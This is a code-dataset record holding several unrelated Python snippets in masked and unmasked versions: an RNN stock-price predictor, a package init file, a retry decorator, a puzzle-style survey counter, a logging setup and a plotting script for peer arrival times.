abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\ndf_stock = df.copy()\ndf_stock.drop(['Date'], 1, inplace=True)\ncols = list(df_stock.columns.values)\ndf_stock_norm = df_stock.copy()\ndf_stock_norm = normalize_data(df_stock_norm)\nseq_len = 50\nx_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm,\n seq_len)\nindex_in_epoch = 0\nperm_array = np.arange(x_train.shape[0])\nnp.random.shuffle(perm_array)\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\nCellType = Cell.BasicRNN\nn_steps = seq_len - 1\nn_inputs = 5\nn_neurons = 200\nn_outputs = 5\nn_layers = 2\nlearning_rate = 0.001\nbatch_size = 50\nn_epochs = 10\ntrain_set_size = x_train.shape[0]\ntest_set_size = x_test.shape[0]\ntf.reset_default_graph()\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_outputs])\nif CellType == Cell.BasicRNN:\n layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.BasicLSTM:\n layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.LSTMCellPeephole:\n layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, activation=tf.nn\n .leaky_relu, use_peepholes=True) for layer in range(n_layers)]\nelif CellType == Cell.GRU:\n layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.\n leaky_relu) for layer in range(n_layers)]\nmulti_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)\nrnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32)\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons])\nstacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs)\noutputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs])\noutputs = outputs[:, n_steps - 1, :]\nloss = tf.reduce_mean(tf.square(outputs - y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\nmodel = ['train_model', 'train_model_LSTM', 'train_model_with_batch_500',\n 'train_model_with_layers_4', 'train_model_with_volume',\n 'model_seq_len_100', 'model_GRU', 'model_LSTM_pipehole']\ny_new = []\nfor i in y_test:\n y_new.append(i[1] * 10000)\nmacd = trend.MovingAverageConvergenceDivergence(y_new)\nprint(macd.calculate())\nmacd.validate()\ntt = trend.ExponentialMovingAverage(y_new, 10)\nprint(tt.calculate())\nplt.figure(figsize=(15, 5))\nplt.subplot(1, 1, 1)\nplt.plot(np.arange(len(y_new)), y_new, color='black', label='test target')\nplt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label=\n 'test prediction')\nplt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red',\n label='test prediction')\nplt.show()\n", "step-5": "import numpy as np\nimport pandas as pd\nimport sklearn\nimport sklearn.preprocessing\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom enum import Enum\nfrom pytalib.indicators import trend\nfrom pytalib.indicators import base\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\nvalid_set_size_percentage = 10\ntest_set_size_percentage = 10\n\ndf = pd.read_csv('data_2019-01-06.csv')\ndf.sort_values('Date')\n\n\n# function for min-max normalization of stock\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape(-1, 1))\n return df\n\n\n# function to create train, validation, test data given stock data and sequence length\ndef load_data(stock, seq_len):\n data_raw = stock.values # convert to numpy array\n data = []\n\n # create all possible sequences of length seq_len\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index: index + seq_len])\n\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\n# show predictions: 0 = open, 1 = close, 2 = highest, 3 = lowest, 4 = volume\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]),\n y_test[:, ft], color='black', label='test target')\n\n plt.plot(np.arange(y_test_pred.shape[0]),\n y_test_pred[:, ft], color='green', label='test prediction')\n\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if (abs((y_test_pred[:, ft][index] - y_test[:, ft][index])) / abs(y_test[:, ft][index]) * 100) < error_percent:\n x += 1\n print(\"Percent of predictions which error is less then {}% = {}%\".format(error_percent, x / len(y_test) * 100))\n\n # Calculating the direction between 2 points using true values and predicted values\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if (y_test[:, ft][index - distance] <= y_test[:, ft][index] and y_test_pred[:, ft][index - distance] <=\n y_test_pred[:, ft]\n [index]) or (\n y_test[:, ft][index - distance] >= y_test[:, ft][index] and y_test_pred[:, ft][index - distance]\n >= y_test_pred[:, ft][index]):\n z += 1\n print(\"Percent of correct predicted direction = {}%\".format(z / len(y_test) * 100))\n\n plt.show()\n\n\n# choose one stock\ndf_stock = df.copy()\ndf_stock.drop(['Date'], 1, inplace=True)\ncols = list(df_stock.columns.values)\n\n# normalize stock\ndf_stock_norm = df_stock.copy()\ndf_stock_norm = normalize_data(df_stock_norm)\n\n# create train, test data\nseq_len = 50 # choose sequence length\nx_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm, seq_len)\n\nindex_in_epoch = 0\nperm_array = np.arange(x_train.shape[0])\nnp.random.shuffle(perm_array)\n\n\n# function to get the next batch\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array) # shuffle permutation array\n start = 0 # start next epoch\n index_in_epoch = batch_size\n\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n# parameters\nCellType = Cell.BasicRNN\nn_steps = seq_len - 1\nn_inputs = 5\nn_neurons = 200\nn_outputs = 5\nn_layers = 2\nlearning_rate = 0.001\nbatch_size = 50\nn_epochs = 10\ntrain_set_size = x_train.shape[0]\ntest_set_size = x_test.shape[0]\n\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_outputs])\n\nif CellType == Cell.BasicRNN:\n layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.elu)\n for layer in range(n_layers)]\nelif CellType == Cell.BasicLSTM:\n layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=tf.nn.elu)\n for layer in range(n_layers)]\nelif CellType == Cell.LSTMCellPeephole:\n layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons,\n activation=tf.nn.leaky_relu, use_peepholes=True)\n for layer in range(n_layers)]\nelif CellType == Cell.GRU:\n layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.leaky_relu)\n for layer in range(n_layers)]\n\nmulti_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)\nrnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32)\n\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons])\nstacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs)\noutputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs])\noutputs = outputs[:, n_steps - 1, :] # keep only last output of sequence\n\nloss = tf.reduce_mean(tf.square(outputs - y)) # loss function = mean squared error\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\n\n\n# run graph\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size) # fetch the next training batch\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train, mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\nmodel = ['train_model', 'train_model_LSTM', 'train_model_with_batch_500', 'train_model_with_layers_4',\n 'train_model_with_volume', 'model_seq_len_100', \"model_GRU\", 'model_LSTM_pipehole']\n\n# train_data(model[0])\n# test(model[0])\ny_new = []\nfor i in y_test:\n y_new.append(i[1] * 10000)\nmacd = trend.MovingAverageConvergenceDivergence(y_new)\nprint(macd.calculate())\nmacd.validate()\n\ntt = trend.ExponentialMovingAverage(y_new, 10)\nprint(tt.calculate())\n\nplt.figure(figsize=(15, 5))\nplt.subplot(1, 1, 1)\nplt.plot(np.arange(len(y_new)), y_new, color='black', label='test target')\nplt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label='test prediction')\nplt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red', label='test prediction')\nplt.show()\n", "step-ids": [ 7, 8, 9, 10, 12 ] }
[ 7, 8, 9, 10, 12 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> VERSION = 0, 2, 14 __version__ = '.'.join(map(str, VERSION)) __all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder', 'TableStorage', 'TableStorageWrapper', 'export_decorator'] <|reserved_special_token_1|> from azfs.az_file_client import AzFileClient, export_decorator from azfs.az_file_system import AzFileSystem from azfs.utils import BlobPathDecoder from .table_storage import TableStorage, TableStorageWrapper VERSION = 0, 2, 14 __version__ = '.'.join(map(str, VERSION)) __all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder', 'TableStorage', 'TableStorageWrapper', 'export_decorator'] <|reserved_special_token_1|> from azfs.az_file_client import ( AzFileClient, export_decorator ) from azfs.az_file_system import AzFileSystem from azfs.utils import BlobPathDecoder from .table_storage import ( TableStorage, TableStorageWrapper ) # comparable tuple VERSION = (0, 2, 14) # generate __version__ via VERSION tuple __version__ = ".".join(map(str, VERSION)) __all__ = [ "AzFileClient", "AzFileSystem", "BlobPathDecoder", "TableStorage", "TableStorageWrapper", "export_decorator" ]
flexible
{ "blob_id": "e7239b4bc3db9bd427b9be888621f66e81b5edeb", "index": 2242, "step-1": "<mask token>\n", "step-2": "<mask token>\nVERSION = 0, 2, 14\n__version__ = '.'.join(map(str, VERSION))\n__all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder',\n 'TableStorage', 'TableStorageWrapper', 'export_decorator']\n", "step-3": "from azfs.az_file_client import AzFileClient, export_decorator\nfrom azfs.az_file_system import AzFileSystem\nfrom azfs.utils import BlobPathDecoder\nfrom .table_storage import TableStorage, TableStorageWrapper\nVERSION = 0, 2, 14\n__version__ = '.'.join(map(str, VERSION))\n__all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder',\n 'TableStorage', 'TableStorageWrapper', 'export_decorator']\n", "step-4": "from azfs.az_file_client import (\n AzFileClient,\n export_decorator\n)\n\nfrom azfs.az_file_system import AzFileSystem\nfrom azfs.utils import BlobPathDecoder\n\nfrom .table_storage import (\n TableStorage,\n TableStorageWrapper\n)\n\n# comparable tuple\nVERSION = (0, 2, 14)\n# generate __version__ via VERSION tuple\n__version__ = \".\".join(map(str, VERSION))\n\n__all__ = [\n \"AzFileClient\",\n \"AzFileSystem\",\n \"BlobPathDecoder\",\n \"TableStorage\",\n \"TableStorageWrapper\",\n \"export_decorator\"\n]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from functools import wraps from time import sleep def retry(retry_count = 2, delay = 5, action_description = 'not specified', allowed_exceptions=()): def decorator(func): @wraps(func) # to preserve metadata of the function to be decorated def wrapper(*args, **kwargs): for _ in range(retry_count): try: return func(*args, **kwargs) except allowed_exceptions as e: print('Error executing {}: {}'.format(func.__name__, e)) print('Waiting for {} sec before executing {} again'.format(delay, func.__name__)) sleep(delay) print('Retrying to execute ' + func.__name__ + ' (action: ' + action_description + ')') return wrapper return decorator
normal
{ "blob_id": "79e4592d5ea84cc7c97d68a9390eb5d387045cf0", "index": 4344, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef retry(retry_count=2, delay=5, action_description='not specified',\n allowed_exceptions=()):\n\n def decorator(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n for _ in range(retry_count):\n try:\n return func(*args, **kwargs)\n except allowed_exceptions as e:\n print('Error executing {}: {}'.format(func.__name__, e))\n print('Waiting for {} sec before executing {} again'.\n format(delay, func.__name__))\n sleep(delay)\n print('Retrying to execute ' + func.__name__ +\n ' (action: ' + action_description + ')')\n return wrapper\n return decorator\n", "step-3": "from functools import wraps\nfrom time import sleep\n\n\ndef retry(retry_count=2, delay=5, action_description='not specified',\n allowed_exceptions=()):\n\n def decorator(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n for _ in range(retry_count):\n try:\n return func(*args, **kwargs)\n except allowed_exceptions as e:\n print('Error executing {}: {}'.format(func.__name__, e))\n print('Waiting for {} sec before executing {} again'.\n format(delay, func.__name__))\n sleep(delay)\n print('Retrying to execute ' + func.__name__ +\n ' (action: ' + action_description + ')')\n return wrapper\n return decorator\n", "step-4": "from functools import wraps\nfrom time import sleep\n\ndef retry(retry_count = 2, delay = 5, action_description = 'not specified', allowed_exceptions=()):\n def decorator(func):\n @wraps(func) # to preserve metadata of the function to be decorated\n def wrapper(*args, **kwargs):\n for _ in range(retry_count): \n try:\n return func(*args, **kwargs)\n except allowed_exceptions as e:\n print('Error executing {}: {}'.format(func.__name__, e))\n print('Waiting for {} sec before executing {} again'.format(delay, func.__name__))\n sleep(delay)\n print('Retrying to execute ' + func.__name__ + ' (action: ' + action_description + ')')\n return wrapper\n return decorator", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> from .file_uploader_routes import FILE_UPLOADER_BLUEPRINT
flexible
{ "blob_id": "c7dacdb53efb6935314c5e3718a4a2f1d862b07d", "index": 2340, "step-1": "<mask token>\n", "step-2": "from .file_uploader_routes import FILE_UPLOADER_BLUEPRINT\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for line in lines: if line == '\n' or line == lines[-1]: if line == lines[-1]: line = line.strip() group_responses.append(line) group_responses_flattened = [item for sublist in group_responses for item in sublist] group_responses_set = set(group_responses_flattened) count_any_member_has_response += len(group_responses_set) for char in group_responses[0]: char_in_all_members = True for item in group_responses: if char not in item: char_in_all_members = False if char_in_all_members == True: count_all_members_have_response += 1 group_responses = [] else: line = line.strip() group_responses.append(line) print('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response) print('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response) <|reserved_special_token_1|> declarations_file = open('day6_declarations.txt', 'r') lines = declarations_file.readlines() group_responses = [] count_any_member_has_response = 0 count_all_members_have_response = 0 for line in lines: if line == '\n' or line == lines[-1]: if line == lines[-1]: line = line.strip() group_responses.append(line) group_responses_flattened = [item for sublist in group_responses for item in sublist] group_responses_set = set(group_responses_flattened) count_any_member_has_response += len(group_responses_set) for char in group_responses[0]: char_in_all_members = True for item in group_responses: if char not in item: char_in_all_members = False if char_in_all_members == True: count_all_members_have_response += 1 group_responses = [] else: line = line.strip() group_responses.append(line) print('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response) print('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response) <|reserved_special_token_1|> # read in file of customs declaration responses declarations_file = open('day6_declarations.txt', 'r') lines = declarations_file.readlines() # initialise variables group_responses = [] # temporary container for all responses of each group member count_any_member_has_response = 0 # count for part 1 count_all_members_have_response = 0 # count for part 2 # loop over file for line in lines: # if have a blank line (or at end of file), means we have reached end of # an group's info, so save declaration response info for current group # and reset group_responses list if line == '\n' or line == lines[-1]: # case where at end of file, want to save that last line if line == lines[-1]: # remove newlines at end of lines and split by whitespace line = line.strip() group_responses.append(line) #print(group_responses) # PART 1 # for each group, count the number of questions to which ANYONE responded "yes" # what is the sum of those counts? # each group member has their responses as one element in group_responses # so flatten this so each char of each group member now makes up one element group_responses_flattened = [item for sublist in group_responses for item in sublist] # there will be duplicates in the flattened array # first part wants the total number of UNIQUE elements so convert to set group_responses_set = set(group_responses_flattened) #print(group_responses_set) # count number of unique elements in the set and add this to # the count_any_member_has_response var which keeps track of the total count # for all groups count_any_member_has_response += len(group_responses_set) # PART 2 # for each group, count the number of questions to which EVERYONE answered "yes" # what is the sum of those counts? # easiest way is to look at first group member # how many of the characters for the first group member # appear for ALL the other group members for char in group_responses[0]: char_in_all_members = True # see if char exists for all other group members - if not then set # char_in_all_members to False for item in group_responses: if char not in item: char_in_all_members = False # if char appears for all members, add one to # count_all_members_have_response var which keeps track of the total count # for all groups if char_in_all_members == True: #print('char', char, 'exists for all members of this group') count_all_members_have_response += 1 # finished processing this group so reset the temp var group_responses # so it can be filled again for the next group group_responses = [] else: # we are still in the same group so continue adding # group member responses to group_responses list line = line.strip() group_responses.append(line) # print out final counts for parts 1 and 2 print('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response) print('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response)
flexible
{ "blob_id": "cb6ed6422a5591f1de0a947f75ad080f250e8443", "index": 7718, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor line in lines:\n if line == '\\n' or line == lines[-1]:\n if line == lines[-1]:\n line = line.strip()\n group_responses.append(line)\n group_responses_flattened = [item for sublist in group_responses for\n item in sublist]\n group_responses_set = set(group_responses_flattened)\n count_any_member_has_response += len(group_responses_set)\n for char in group_responses[0]:\n char_in_all_members = True\n for item in group_responses:\n if char not in item:\n char_in_all_members = False\n if char_in_all_members == True:\n count_all_members_have_response += 1\n group_responses = []\n else:\n line = line.strip()\n group_responses.append(line)\nprint('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =',\n count_any_member_has_response)\nprint('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =',\n count_all_members_have_response)\n", "step-3": "declarations_file = open('day6_declarations.txt', 'r')\nlines = declarations_file.readlines()\ngroup_responses = []\ncount_any_member_has_response = 0\ncount_all_members_have_response = 0\nfor line in lines:\n if line == '\\n' or line == lines[-1]:\n if line == lines[-1]:\n line = line.strip()\n group_responses.append(line)\n group_responses_flattened = [item for sublist in group_responses for\n item in sublist]\n group_responses_set = set(group_responses_flattened)\n count_any_member_has_response += len(group_responses_set)\n for char in group_responses[0]:\n char_in_all_members = True\n for item in group_responses:\n if char not in item:\n char_in_all_members = False\n if char_in_all_members == True:\n count_all_members_have_response += 1\n group_responses = []\n else:\n line = line.strip()\n group_responses.append(line)\nprint('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =',\n count_any_member_has_response)\nprint('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =',\n count_all_members_have_response)\n", "step-4": "\n\n# read in file of customs declaration responses\ndeclarations_file = open('day6_declarations.txt', 'r')\nlines = declarations_file.readlines()\n\n# initialise variables\ngroup_responses = [] # temporary container for all responses of each group member\ncount_any_member_has_response = 0 # count for part 1\ncount_all_members_have_response = 0 # count for part 2\n\n\n# loop over file\nfor line in lines:\n\n\t# if have a blank line (or at end of file), means we have reached end of \n\t# an group's info, so save declaration response info for current group \n\t# and reset group_responses list\n\n\tif line == '\\n' or line == lines[-1]:\n\n\t\t# case where at end of file, want to save that last line\n\t\tif line == lines[-1]:\n\t\t\t\n\t\t\t# remove newlines at end of lines and split by whitespace\n\t\t\tline = line.strip()\n\t\t\tgroup_responses.append(line)\n\t\t\t\n\t\t#print(group_responses)\n\n\t\t\n\n\n\t\t# PART 1\n\t\t# for each group, count the number of questions to which ANYONE responded \"yes\" \n\t\t# what is the sum of those counts?\n\n\t\t# each group member has their responses as one element in group_responses\n\t\t# so flatten this so each char of each group member now makes up one element\n\t\tgroup_responses_flattened = [item for sublist in group_responses for item in sublist]\n\n\t\t# there will be duplicates in the flattened array\n\t\t# first part wants the total number of UNIQUE elements so convert to set\n\t\tgroup_responses_set = set(group_responses_flattened)\n\t\t#print(group_responses_set)\n\n\t\t# count number of unique elements in the set and add this to \n\t\t# the count_any_member_has_response var which keeps track of the total count\n\t\t# for all groups\n\t\tcount_any_member_has_response += len(group_responses_set)\n\n\n\n\n\n\n\t\t# PART 2\n\t\t# for each group, count the number of questions to which EVERYONE answered \"yes\"\n\t\t# what is the sum of those counts?\n\n\t\t# easiest way is to look at first group member\n\t\t# how many of the characters for the first group member\n\t\t# appear for ALL the other group members\n\t\tfor char in group_responses[0]:\n\n\t\t\tchar_in_all_members = True\n\n\t\t\t# see if char exists for all other group members - if not then set\n\t\t\t# char_in_all_members to False\n\t\t\tfor item in group_responses:\n\t\t\t\t\n\t\t\t\tif char not in item:\n\n\t\t\t\t\tchar_in_all_members = False\n\n\t\t\t# if char appears for all members, add one to\n\t\t\t# count_all_members_have_response var which keeps track of the total count\n\t\t\t# for all groups\n\t\t\tif char_in_all_members == True:\n\t\t\t\t#print('char', char, 'exists for all members of this group')\n\t\t\t\tcount_all_members_have_response += 1\n\n\t\t# finished processing this group so reset the temp var group_responses\n\t\t# so it can be filled again for the next group\n\t\tgroup_responses = []\n\t\n\t\n\n\n\n\n\telse:\n\n\t\t# we are still in the same group so continue adding \n\t\t# group member responses to group_responses list\n\t\tline = line.strip()\n\t\tgroup_responses.append(line)\n\t\t\n\n\n\n# print out final counts for parts 1 and 2\nprint('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response)\nprint('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response)\n\n\n\n\n\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import logging formatter = logging.Formatter("%(asctime)s [%(levelname)s] : %(message)s") log = logging.getLogger("othello") log.setLevel(logging.DEBUG) stream_hander = logging.StreamHandler() stream_hander.setFormatter(formatter) log.addHandler(stream_hander)
normal
{ "blob_id": "675fbdfd519d00ab10bf613e8abb7338e484fe65", "index": 57, "step-1": "<mask token>\n", "step-2": "<mask token>\nlog.setLevel(logging.DEBUG)\n<mask token>\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "step-3": "<mask token>\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "step-4": "import logging\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "step-5": "import logging\n\n\nformatter = logging.Formatter(\"%(asctime)s [%(levelname)s] : %(message)s\")\n\nlog = logging.getLogger(\"othello\")\nlog.setLevel(logging.DEBUG)\n\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import pandas as pd import numpy as np import seaborn as sns from matplotlib import pyplot as plt, ticker from analysis.report import lib_plot from analysis.report.lib_agent import known_agents from analysis.report.lib_fmt import fmt_thousands from lib_db import DBClient def main(db_client: DBClient): sns.set_theme() peer_ids = db_client.get_dangling_peer_ids() arrivals = db_client.get_inter_arrival_time(peer_ids) results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s']) results_df = results_df.assign( diff_in_h=results_df.diff_in_s.apply(lambda x: x / 3600), ) fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True) sns.ecdfplot(ax=ax1, x="diff_in_h", data=results_df) ax1.set_xlim(0, 48) ax1.set_xticks(np.arange(0, 50, step=4)) ax1.set_xlabel("Time in Hours") ax1.set_ylabel("Number of Peers in %") ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: "%d" % int(x * 100))) ax1.legend(loc='lower right', labels=[f"dangling ({fmt_thousands(len(results_df))})"]) ax1.title.set_text(f"CDF of Inter Arrival Times of Dangling Peers") labels = [] for agent in known_agents: peer_ids = db_client.get_peer_ids_for_agent_versions([agent]) arrivals = db_client.get_inter_arrival_time(peer_ids) data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s']) data = data.assign( diff_in_h=data.diff_in_s.apply(lambda x: x / 3600), ) labels += [f"{agent} ({fmt_thousands(len(data))})"] sns.ecdfplot(ax=ax2, x="diff_in_h", data=data) ax2.set_xlim(0, 48) ax2.set_xticks(np.arange(0, 50, step=4)) ax2.set_xlabel("Time in Hours") ax2.set_ylabel("Number of Peers in %") ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: "%d" % int(x * 100))) ax2.title.set_text(f"CDF of Inter Arrival Times by Agent") ax2.legend(loc='lower right', labels=labels) plt.tight_layout() lib_plot.savefig("cdf-inter-arrival-dangling") plt.show() if __name__ == '__main__': client = DBClient() main(client)
normal
